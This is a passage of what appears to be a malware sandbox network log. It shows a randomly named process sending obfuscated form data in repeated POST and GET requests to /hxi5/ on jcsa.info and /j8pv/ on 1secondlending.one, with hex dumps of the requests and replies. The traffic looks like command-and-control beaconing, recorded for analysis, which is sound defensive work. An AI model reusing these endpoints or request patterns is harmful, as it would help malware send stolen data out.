                                                                                                                  Dec 2, 2024 15:26:01.720887899 CET770OUTPOST /hxi5/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 223
                                                                                                                  Connection: close
                                                                                                                  Host: www.jcsa.info
                                                                                                                  Origin: http://www.jcsa.info
                                                                                                                  Referer: http://www.jcsa.info/hxi5/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 79 7a 6c 65 54 58 4c 68 5a 68 50 6f 78 4e 31 78 6f 37 73 52 49 4f 63 6e 51 67 64 69 34 49 61 6c 6a 77 59 48 70 6d 5a 58 30 69 6d 62 72 5a 31 46 73 73 47 69 75 65 70 36 4c 33 6e 75 6d 62 6b 6f 6a 6d 4b 32 55 70 30 58 69 52 55 38 4f 31 73 6e 4d 43 4b 54 42 50 78 7a 2f 50 34 38 41 67 64 75 56 6d 6e 59 73 33 46 56 65 31 41 33 4a 51 56 61 37 7a 52 74 2f 6c 4d 79 79 62 56 73 4e 76 59 54 44 64 2f 77 55 4d 45 74 6a 30 62 47 76 78 61 72 31 39 6f 31 57 49 57 74 7a 7a 71 2b 7a 5a 59 70 5a 78 63 57 46 50 48 32 36 6a 69 48 44 65 43 66 4c 30 42 73 55 5a 75 4d 58 4c 74 55 64 79 57 4b 65 62 56 2b 59 77 34 42 2f 55 4c 47 37 4f 52 48 4f 7a 62 50 63 71 32 33 70 66 6c 49
                                                                                                                  Data Ascii: bV=yzleTXLhZhPoxN1xo7sRIOcnQgdi4IaljwYHpmZX0imbrZ1FssGiuep6L3numbkojmK2Up0XiRU8O1snMCKTBPxz/P48AgduVmnYs3FVe1A3JQVa7zRt/lMyybVsNvYTDd/wUMEtj0bGvxar19o1WIWtzzq+zZYpZxcWFPH26jiHDeCfL0BsUZuMXLtUdyWKebV+Yw4B/ULG7ORHOzbPcq23pflI


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  35192.168.2.550011208.91.197.3980728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:26:04.398523092 CET1787OUTPOST /hxi5/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 1239
                                                                                                                  Connection: close
                                                                                                                  Host: www.jcsa.info
                                                                                                                  Origin: http://www.jcsa.info
                                                                                                                  Referer: http://www.jcsa.info/hxi5/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 79 7a 6c 65 54 58 4c 68 5a 68 50 6f 78 4e 31 78 6f 37 73 52 49 4f 63 6e 51 67 64 69 34 49 61 6c 6a 77 59 48 70 6d 5a 58 30 6a 65 62 71 6f 56 46 73 4c 71 69 6f 75 70 36 46 58 6e 74 6d 62 6b 50 6a 6d 53 79 55 70 34 68 69 54 73 38 4f 51 67 6e 46 54 4b 54 4b 50 78 7a 33 76 34 2f 4f 41 64 42 56 6c 50 63 73 33 56 56 65 31 41 33 4a 57 5a 61 38 6d 74 74 73 31 4d 78 6d 4c 56 4a 63 2f 59 76 44 64 6e 4f 55 4e 77 54 69 41 76 47 76 52 71 72 33 50 77 31 4a 34 57 76 77 7a 71 32 7a 5a 56 78 5a 31 38 77 46 4f 6a 51 36 6a 4b 48 42 59 44 62 61 48 39 37 42 59 58 76 61 72 52 66 50 53 61 34 58 37 5a 6f 64 7a 63 6d 79 41 62 46 7a 37 78 52 4e 77 54 46 4e 75 47 46 37 6f 77 33 47 35 48 4e 65 56 2b 58 68 4e 4a 7a 51 4d 55 52 34 4a 52 6c 43 73 31 77 4b 36 47 5a 61 4d 47 6e 66 32 4d 5a 33 6b 56 53 41 43 59 6c 4a 45 67 33 61 55 73 37 75 55 30 6f 44 52 53 35 6b 77 57 45 4b 67 69 38 67 52 6b 61 4d 30 63 77 55 58 69 6b 48 52 79 42 64 4e 45 62 55 71 55 69 6d 30 70 49 37 37 5a 74 76 79 78 58 6f 69 79 39 4a 6b 31 79 44 62 43 [TRUNCATED]
                                                                                                                  Data Ascii: bV=yzleTXLhZhPoxN1xo7sRIOcnQgdi4IaljwYHpmZX0jebqoVFsLqioup6FXntmbkPjmSyUp4hiTs8OQgnFTKTKPxz3v4/OAdBVlPcs3VVe1A3JWZa8mtts1MxmLVJc/YvDdnOUNwTiAvGvRqr3Pw1J4Wvwzq2zZVxZ18wFOjQ6jKHBYDbaH97BYXvarRfPSa4X7ZodzcmyAbFz7xRNwTFNuGF7ow3G5HNeV+XhNJzQMUR4JRlCs1wK6GZaMGnf2MZ3kVSACYlJEg3aUs7uU0oDRS5kwWEKgi8gRkaM0cwUXikHRyBdNEbUqUim0pI77ZtvyxXoiy9Jk1yDbCkaIkgOP1KHh4Ek9+hCQvpTcP7zH8/47NAUYuHvjXVxG4WCGI2lUP7rlp54gP30GMn/PVG/bOWcWxnpOHxDGpDN3Vgur/6jgGgOe80LAonpUdKAF4JLpUuapEk4MBoCc2+yuWmJ0pA2TtLVgzccRLa5IrMzv9KBlD4GqkBkF4Os17d+YriONsbMfbuzPtCQU0KlEhxwoy4kkqj444MmaZXcXvs1i7Lc+Uy9vAA4oX5qhKd/oQzSP7otgiMWln2HTmZVbMJ8oC/uwbTE4Qj60bxw7b6w5U4oBZgCe8jL0PhKEAvBmTIkj2O2tn+3yqa32uU1xrFM2b+1g+w+hH4Tpmyb8kU4J6UFCiBcJigx6fabWT7eVKqwQWYE9yMzsTRfKfMIdUfWxWRziVz53z1ZWlcFEie72Y/uGv23AcWtkzzWRv3PoIma1sYoa9VK0CQtJU/XUzhFfC7Y+q7/iWDilQD5kcl2ciFpu6TDHV9Mpd1dlcH+7akLchIHqwT5djE4ylwYyV1Z1083dbVMFFZASfMOarPxZAf4LVFPkSIZ0qdl5NCyVZhtGFPv10ZJcMUChgt2f4VmdXKhVNY8FprPDEMcEsn+DS+F2JkHzj+3Kqi1044cfSKYDymAkRhs0525OwsOLdyHi6cqAIHqkobXtxhRE7BbMJ6ST/6y [TRUNCATED]


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  36192.168.2.550012208.91.197.3980728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:26:07.059227943 CET494OUTGET /hxi5/?bV=/xN+QifpSgLb8oJZvOcEecwEXTNjyqH/ixYmgFld7FWiq7hEgfqLv6xcCSKy7O4D9GLUZYEuvgkAAG4+HQzECOhz/eBMNQtzbXvy0GcsSmUnEXx6wmc7on4m5IV1LddeYQ==&wzcP=iLdd HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Connection: close
                                                                                                                  Host: www.jcsa.info
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Dec 2, 2024 15:26:08.807476997 CET1236INHTTP/1.1 200 OK
                                                                                                                  Date: Mon, 02 Dec 2024 14:26:08 GMT
                                                                                                                  Server: Apache
                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                  Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                  Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                  Set-Cookie: vsid=906vr480695168182053153; expires=Sat, 01-Dec-2029 14:26:08 GMT; Max-Age=157680000; path=/; domain=www.jcsa.info; HttpOnly
                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_PNkdYjVwmf2MQCHTN+qlTy3P5gIK18SRibpMyap0IX997Z3D9wWzF7KSoYTDjZC5xWLTFEn4t7Wbd9vFU/tLhQ==
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 61 63 64 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20
                                                                                                                  Data Ascii: acdb<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net">
                                                                                                                  Dec 2, 2024 15:26:08.807610035 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d
                                                                                                                  Data Ascii: <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)
                                                                                                                  Dec 2, 2024 15:26:08.807725906 CET1236INData Raw: 66 28 74 79 70 65 6f 66 28 6a 29 21 3d 22 62 6f 6f 6c 65 61 6e 22 29 7b 6a 3d 74 72 75 65 7d 69 66 28 6a 26 26 74 79 70 65 6f 66 28 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 29 3d 3d 22 73 74 72 69 6e 67 22 26 26 63 6d 70 5f 67
                                                                                                                  Data Ascii: f(typeof(j)!="boolean"){j=true}if(j&&typeof(cmp_getlang.usedlang)=="string"&&cmp_getlang.usedlang!==""){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="languages" in na
                                                                                                                  Dec 2, 2024 15:26:08.807742119 CET1236INData Raw: 6e 20 68 29 7b 66 6f 72 28 76 61 72 20 71 3d 30 3b 71 3c 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 2e 6c 65 6e 67 74 68 3b 71 2b 2b 29 7b 69 66 28 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 5b 71 5d 2e 6c
                                                                                                                  Data Ascii: n h){for(var q=0;q<h.cmp_customlanguages.length;q++){if(h.cmp_customlanguages[q].l.toUpperCase()==o.toUpperCase()){o="en";break}}}b="_"+o}function x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.substr(d
                                                                                                                  Dec 2, 2024 15:26:08.807931900 CET1236INData Raw: 72 61 6d 73 3a 22 22 29 2b 28 75 2e 63 6f 6f 6b 69 65 2e 6c 65 6e 67 74 68 3e 30 3f 22 26 5f 5f 63 6d 70 66 63 63 3d 31 22 3a 22 22 29 2b 22 26 6c 3d 22 2b 6f 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2b 22 26 6f 3d 22 2b 28 6e 65 77 20 44 61 74
                                                                                                                  Data Ascii: rams:"")+(u.cookie.length>0?"&__cmpfcc=1":"")+"&l="+o.toLowerCase()+"&o="+(new Date()).getTime();j.type="text/javascript";j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if(u.bo
                                                                                                                  Dec 2, 2024 15:26:08.807945967 CET694INData Raw: 63 75 6d 65 6e 74 2e 62 6f 64 79 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29 3b 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22
                                                                                                                  Data Ascii: cument.body){var a=document.createElement("iframe");a.style.cssText="display:none";if("cmp_cdn" in window&&"cmp_ultrablocking" in window&&window.cmp_ultrablocking>0){a.src="//"+window.cmp_cdn+"/delivery/empty.html"}a.name=b;a.setAttribute("tit
                                                                                                                  Dec 2, 2024 15:26:08.852533102 CET1236INData Raw: 74 72 28 62 2e 69 6e 64 65 78 4f 66 28 22 3d 22 29 2b 31 2c 62 2e 6c 65 6e 67 74 68 29 7d 69 66 28 68 3d 3d 67 29 7b 66 3d 63 7d 76 61 72 20 65 3d 62 2e 69 6e 64 65 78 4f 66 28 22 3b 22 29 2b 31 3b 69 66 28 65 3d 3d 30 29 7b 65 3d 62 2e 6c 65 6e
                                                                                                                  Data Ascii: tr(b.indexOf("=")+1,b.length)}if(h==g){f=c}var e=b.indexOf(";")+1;if(e==0){e=b.length}b=b.substring(e,b.length)}return(f)};window.cmp_stub=function(){var a=arguments;__cmp.a=__cmp.a||[];if(!a.length){return __cmp.a}else{if(a[0]==="ping"){if(a[
                                                                                                                  Dec 2, 2024 15:26:08.852550030 CET1236INData Raw: 64 3b 5f 5f 67 70 70 2e 65 2e 70 75 73 68 28 7b 69 64 3a 63 2c 63 61 6c 6c 62 61 63 6b 3a 66 7d 29 3b 72 65 74 75 72 6e 7b 65 76 65 6e 74 4e 61 6d 65 3a 22 6c 69 73 74 65 6e 65 72 52 65 67 69 73 74 65 72 65 64 22 2c 6c 69 73 74 65 6e 65 72 49 64
                                                                                                                  Data Ascii: d;__gpp.e.push({id:c,callback:f});return{eventName:"listenerRegistered",listenerId:c,data:true,pingData:window.cmp_gpp_ping()}}else{if(g==="removeEventListener"){var h=false;__gpp.e=__gpp.e||[];for(var d=0;d<__gpp.e.length;d++){if(__gpp.e[d].i
                                                                                                                  Dec 2, 2024 15:26:08.852565050 CET1236INData Raw: 63 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 26 26 63 21 3d 3d 6e 75 6c 6c 26 26 22 5f 5f 74 63 66 61 70 69 43 61 6c 6c 22 20 69 6e 20 63 29 7b 76 61 72 20 62 3d 63 2e 5f 5f 74 63 66 61 70 69 43 61 6c 6c 3b 77 69 6e 64 6f 77 2e 5f 5f 74 63 66 61 70 69
                                                                                                                  Data Ascii: c)==="object"&&c!==null&&"__tcfapiCall" in c){var b=c.__tcfapiCall;window.__tcfapi(b.command,b.version,function(h,g){var e={__tcfapiReturn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},b.parameter)
                                                                                                                  Dec 2, 2024 15:26:08.852581024 CET1236INData Raw: 63 6d 70 5f 61 64 64 46 72 61 6d 65 28 22 5f 5f 75 73 70 61 70 69 4c 6f 63 61 74 6f 72 22 29 7d 69 66 28 21 28 22 63 6d 70 5f 64 69 73 61 62 6c 65 74 63 66 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 21 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 69 73 61
                                                                                                                  Data Ascii: cmp_addFrame("__uspapiLocator")}if(!("cmp_disabletcf" in window)||!window.cmp_disabletcf){window.cmp_addFrame("__tcfapiLocator")}if(!("cmp_disablegpp" in window)||!window.cmp_disablegpp){window.cmp_addFrame("__gppLocator")}window.cmp_setStub("
                                                                                                                  Dec 2, 2024 15:26:08.927750111 CET1236INData Raw: 6c 6f 63 61 74 69 6f 6e 3d 61 62 70 65 72 75 72 6c 3b 7d 63 61 74 63 68 28 65 72 72 29 7b 7d 7d 3c 2f 73 63 72 69 70 74 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 69 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 61 3d 27 32 39 36 32 37 27 20 62 3d 27 33
                                                                                                                  Data Ascii: location=abperurl;}catch(err){}}</script><meta name="tids" content="a='29627' b='33571' c='jcsa.info' d='entity_mapped'" /><title>Jcsa.info</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" con


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  37192.168.2.55001343.205.198.2980728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:26:15.019341946 CET777OUTPOST /j8pv/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 203
                                                                                                                  Connection: close
                                                                                                                  Host: www.1secondlending.one
                                                                                                                  Origin: http://www.1secondlending.one
                                                                                                                  Referer: http://www.1secondlending.one/j8pv/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 45 4b 47 44 2b 46 4e 56 6b 2b 47 4f 4f 52 33 54 75 71 4b 32 67 39 58 30 37 6d 46 50 44 44 71 64 6b 57 31 64 50 6d 38 4c 75 36 36 2f 43 74 37 43 6c 54 35 2b 31 6b 6a 30 72 77 4e 68 50 52 63 2b 51 47 47 4c 36 32 57 50 44 52 62 43 4a 57 48 4d 70 4a 45 7a 31 41 70 2f 59 74 4d 43 52 59 4a 62 4f 51 7a 6f 66 66 57 61 37 78 30 57 42 31 71 45 6c 32 68 6d 55 66 4d 77 50 57 47 2b 33 79 66 39 32 2b 72 47 61 53 70 46 4a 66 35 71 44 71 70 4a 7a 50 50 4b 7a 38 62 6f 4b 51 51 33 77 38 66 66 73 4d 32 70 30 65 30 6d 49 48 52 6f 53 52 50 6f 57 71 6d 33 49 64 4c 69 53 56 35 56 32 68 76 45 36 49 68 31 58 42 77 3d
                                                                                                                  Data Ascii: bV=EKGD+FNVk+GOOR3TuqK2g9X07mFPDDqdkW1dPm8Lu66/Ct7ClT5+1kj0rwNhPRc+QGGL62WPDRbCJWHMpJEz1Ap/YtMCRYJbOQzoffWa7x0WB1qEl2hmUfMwPWG+3yf92+rGaSpFJf5qDqpJzPPKz8boKQQ3w8ffsM2p0e0mIHRoSRPoWqm3IdLiSV5V2hvE6Ih1XBw=
                                                                                                                  Dec 2, 2024 15:26:16.533484936 CET691INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Mon, 02 Dec 2024 14:26:16 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 548
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  38192.168.2.55001443.205.198.2980728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:26:17.693114996 CET797OUTPOST /j8pv/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 223
                                                                                                                  Connection: close
                                                                                                                  Host: www.1secondlending.one
                                                                                                                  Origin: http://www.1secondlending.one
                                                                                                                  Referer: http://www.1secondlending.one/j8pv/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 45 4b 47 44 2b 46 4e 56 6b 2b 47 4f 4d 78 48 54 6f 4e 57 32 6f 39 58 7a 2b 6d 46 50 59 7a 72 57 6b 57 35 64 50 69 73 62 76 49 65 2f 43 4a 33 43 6b 53 35 2b 35 45 6a 30 67 51 4e 6b 4c 52 63 31 51 48 37 2b 36 7a 57 50 44 52 2f 43 4a 55 66 4d 70 65 51 77 31 51 70 78 51 4e 4d 45 66 34 4a 62 4f 51 7a 6f 66 66 44 39 37 78 73 57 43 46 61 45 6d 55 4a 6c 58 66 4d 2f 4f 57 47 2b 6d 43 66 35 32 2b 71 72 61 51 64 72 4a 64 42 71 44 6f 78 4a 30 65 50 4a 36 38 61 6a 4f 51 52 70 33 2f 4f 7a 72 4e 65 6c 7a 75 67 6e 57 58 59 53 54 6e 2b 43 4d 49 75 66 62 39 6e 61 43 47 78 69 6e 52 4f 74 67 72 78 46 4a 57 6e 6a 2f 31 6d 4c 51 49 67 70 48 6e 68 63 36 35 35 78 2b 6c 4f 4f
                                                                                                                  Data Ascii: bV=EKGD+FNVk+GOMxHToNW2o9Xz+mFPYzrWkW5dPisbvIe/CJ3CkS5+5Ej0gQNkLRc1QH7+6zWPDR/CJUfMpeQw1QpxQNMEf4JbOQzoffD97xsWCFaEmUJlXfM/OWG+mCf52+qraQdrJdBqDoxJ0ePJ68ajOQRp3/OzrNelzugnWXYSTn+CMIufb9naCGxinROtgrxFJWnj/1mLQIgpHnhc655x+lOO
                                                                                                                  Dec 2, 2024 15:26:19.251204967 CET691INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Mon, 02 Dec 2024 14:26:18 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 548
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  39192.168.2.55001543.205.198.2980728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:26:20.375185966 CET1814OUTPOST /j8pv/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 1239
                                                                                                                  Connection: close
                                                                                                                  Host: www.1secondlending.one
                                                                                                                  Origin: http://www.1secondlending.one
                                                                                                                  Referer: http://www.1secondlending.one/j8pv/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
